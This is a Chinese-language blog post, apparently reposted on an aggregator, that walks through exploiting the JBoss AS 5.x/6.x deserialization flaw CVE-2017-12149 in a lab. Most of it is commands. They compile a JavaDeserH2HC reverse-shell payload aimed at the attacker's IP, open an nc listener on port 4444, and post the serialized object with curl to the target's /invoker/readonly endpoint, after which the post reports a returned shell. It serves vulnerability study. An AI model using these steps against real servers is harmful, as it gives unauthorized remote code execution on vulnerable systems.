JBOSS AS 5.X/6.X 反序列化漏洞(CVE-2017-12149)复现

Posted sch01ar

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了JBOSS AS 5.X/6.X 反序列化漏洞(CVE-2017-12149)复现相关的知识,希望对你有一定的参考价值。

本机IP:192.168.220.145

靶机IP:192.168.220.139,版本为JBOSS AS 6.1.0 Final

首先访问目标地址,http://192.168.220.139:8080/invoker/readonly

技术分享图片

返回500,一般存在

执行命令

┌─[[email protected]]─[~]
└──? #cd /sch01ar/JavaDeserH2HC/
┌─[[email protected]]─[/sch01ar/JavaDeserH2HC]
└──? #javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
┌─[[email protected]]─[/sch01ar/JavaDeserH2HC]
└──? #java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.220.145:4444
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

生成了一个ReverseShellCommonsCollectionsHashMap.ser文件

用nc监听4444端口

┌─[?]─[[email protected]]─[~]
└──? #nc -vlp 4444

发送payload

┌─[[email protected]]─[/sch01ar/JavaDeserH2HC]
└──? #curl http://192.168.220.139:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

技术分享图片

nc成功返回shell

技术分享图片

 

以上是关于JBOSS AS 5.X/6.X 反序列化漏洞(CVE-2017-12149)复现的主要内容,如果未能解决你的问题,请参考以下文章

重大预警 | JbossAS 5.x/6.x 反序列化命令执行漏洞,铱迅WAF可防护

[ vulhub漏洞复现篇 ] JBOSS AS 4.x以下反序列化远程代码执行漏洞CVE-2017-7504

JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)通告

Jboss反序列化漏洞复现(CVE-2017-12149)

Jboss反序列化漏洞复现(CVE-2017-12149)

CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用--自测